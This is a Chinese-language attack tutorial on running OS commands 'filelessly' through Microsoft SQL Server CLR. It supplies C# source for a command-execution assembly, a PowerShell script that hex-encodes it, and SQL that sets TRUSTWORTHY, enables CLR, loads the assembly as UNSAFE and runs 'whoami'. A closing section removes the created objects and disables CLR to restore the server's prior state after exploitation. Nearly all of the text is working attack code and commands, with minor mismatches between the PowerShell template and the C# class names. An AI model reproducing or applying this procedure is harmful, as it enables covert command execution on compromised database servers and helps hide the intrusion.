MSSQL[CLR]不落地执行

一、mssql clr介绍:

 在 mssql 2005 之后的版本中,默认新增了对 clr 的支持,支持.net 框架

二、利用过程

首先创建一个dll，dll的功能命令执行

using System; using System.Data; using System.Diagnostics; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.Threading; using System.Runtime.InteropServices;

namespace Hi.Test { public class SQLClr {
                public static string Run( string proc, string arg )
                {
                    try   { Process p = new Process();    p.StartInfo.FileName = proc;    p.StartInfo.Arguments = arg;    p.StartInfo.UseShellExecute = false;    p.StartInfo.RedirectStandardOutput = true;    p.StartInfo.RedirectStandardError = true;    p.Start();    p.WaitForExit();    return(p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd() );   }   catch ( Exception ex ) { return(ex.ToString() );   }
                }


                public static void RunProc( string proc, string arg )
                {
                    SqlDataRecord record = new SqlDataRecord( new SqlMetaData( "ret", SqlDbType.NVarChar, 4000 ) );   SqlContext.Pipe.SendResultsStart( record );   record.SetString( 0, Run( proc, arg ) );   SqlContext.Pipe.SendResultsRow( record );   SqlContext.Pipe.SendResultsEnd();
                }


                public static string ProcessArch()
                {
                    return(Marshal.SizeOf( typeof(IntPtr) ) == 8 ? "x64" : "x86");
                }


                [DllImport( "kernel32.dll" )] static extern IntPtr VirtualAlloc( IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect );
            } }

 

本地编译后生成dll文件：C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /target:library c:\1.cs

 

 

因为要不落地执行，所以要把生成出来的文件转成hex，用到powershell转成hex

 

 

$assemblyFile = "C:\Users\hello\Desktop\1.dll"
$stringBuilder = New-Object -Type System.Text.StringBuilder
$stringBuilder.Append("CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM `n0x") | Out-Null
$fileStream = [IO.File]::OpenRead($assemblyFile)
while (($byte = $fileStream.ReadByte()) -gt -1) {     
    $stringBuilder.Append($byte.ToString("X2")) | Out-Null
    }
$stringBuilder.AppendLine("`nWITH PERMISSION_SET = UNSAFE") | Out-Null 
$stringBuilder.AppendLine("GO") | Out-Null
$stringBuilder.AppendLine(" ") | Out-Null
$stringBuilder.AppendLine("CREATE PROCEDURE [dbo].[clr_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[clr_exec];") | Out-Null
$stringBuilder.AppendLine("GO") | Out-Null 
$stringBuilder.AppendLine(" ") | Out-Null 
$stringBuilder.AppendLine("EXEC[dbo].[clr_exec] 'whoami'") | Out-Null 
$stringBuilder.AppendLine("GO") | Out-Null 
$stringBuilder.AppendLine(" ") | Out-Null 
$stringBuilder.ToString() -join "" | Out-File d:\2221.txt 

利用上面的那段 hex 创建存储过程,执行系统命令，单句执行。

use msdb;

alter database master set trustworthy on;

exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'clr enabled',1;reconfigure;

create assembly sysinfo from 0x.....   with permission_set=unsafe;

create procedure sysinfo_run_proc(@proc nvarchar(max),@arg nvarchar(max)) as external name sysinfo.[Hi.Test.SQLClr].RunProc;

create function sysinfo_run(@proc nvarchar(max),@arg nvarchar(max)) returns nvarchar(max) as external name sysinfo.[Hi.Test.SQLClr].Run;

select msdb.dbo.sysinfo_run('whoami','/user')

 

利用完毕之后删除创建的存储过程，恢复clr为原始状态

drop function sysinfo_run;

drop procedure sysinfo_run_proc;

drop assembly sysinfo;

exec sp_configure 'clr enabled',0;

RECONFIGURE WITH OVERRIDE;

exec sp_configure 'show advanced options',0;

RECONFIGURE WITH OVERRIDE;